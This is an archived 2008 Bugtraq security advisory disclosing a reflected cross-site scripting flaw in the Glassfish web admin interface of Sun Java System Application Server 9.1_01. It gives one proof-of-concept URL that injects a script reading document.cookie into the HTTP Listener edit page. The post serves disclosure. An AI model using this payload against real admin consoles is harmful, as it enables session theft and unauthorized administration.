XSS - Glassfish Web Admin Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs) )

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: XSS - Glassfish Web Admin Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs) )
From: "Eduardo Jorge" <serrano.neves@xxxxxxxxx>
Date: Tue, 10 Jun 2008 15:12:08 -0300
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to :subject:mime-version:content-type:content-transfer-encoding :content-disposition; bh=XW8SzU/74iuHFY/zn3VsMxH4cmAh3h4KSNKaJ4svPcY=; b=hqIQtNz2s6Z7b/3iz9ZBtVrJuLoK2PsbBGaUXEJQ2C1+skK+cKu3NGXUFpmXHRuXvM oCL/tEsk4lgBuYUR/lfEfeQeGN+J2qmee1fEirOd0Mt4SfPnJVCfQKHzTSiGQtuBzWVS e9tjJBsnNSMg2pIkjbMHzTV3D5U/fl89189xc=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:mime-version:content-type :content-transfer-encoding:content-disposition; b=nfi7hR+JYLFbSyjA8K1Ebdt4cKbHlWBdf4ZI43q8oZeehzgW8LgkRtbilyqOJWzaVm OKljIJROIajDfl6c8zkgwwV79iCHjefS2Uk/UykRtbylh84Agh58nxyWJk8Rs8uVvT9l uXlVNAwNFT1/mJY0agmezh3T7/SCMR29K9ihk=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

==============================

XSS - Glassfish Web Admin Interface (Sun Java System Application
Server 9.1_01 (build b09d-fcs) )

==============================

Author: Eduardo Neves a.k.a _eth0_
Date: 10 june 2008
Site: http://webappsecurity.wordpress.com

==============================

APPLICATION : Glassfish webadmin interface
VERSION : Sun Java System Application Server 9.1_01 (build b09d-fcs)
VENDOR : http://www.sun.com
DOWNLOAD : https://glassfish.dev.java.net/

==============================

IMPACT: XSS, XSRF, etc.

Severity: Low (or not?)

==============================

Descrition:

This vulnerability was found in Edit HTTP Listener section in
Glassfish web admin interface.

This is a vulnerable URL:

http://[HOSTNAME]:4848/configuration/httpListenerEdit.jsf?name=<script>alert(document.cookie);</script>&configName=server-config

-- 
|_|0|_| Serrano Neves - a.k.a eth0
|_|_|0| http://webappsecurity.wordpress.com
|0|0|0| "Talk is cheap. Show me the code." - Linus Torvalds

Prev by Date: iDefense Security Advisory 06.10.08: Multiple Vendor FreeType2 Multiple Heap Overflow Vulnerabilities
Next by Date: ZDI-08-037: Apple QuickTime Indeo Video Buffer Overflow Vulnerability
Previous by thread: iDefense Security Advisory 06.10.08: Multiple Vendor FreeType2 Multiple Heap Overflow Vulnerabilities
Next by thread: ZDI-08-037: Apple QuickTime Indeo Video Buffer Overflow Vulnerability
Index(es):
- Date
- Thread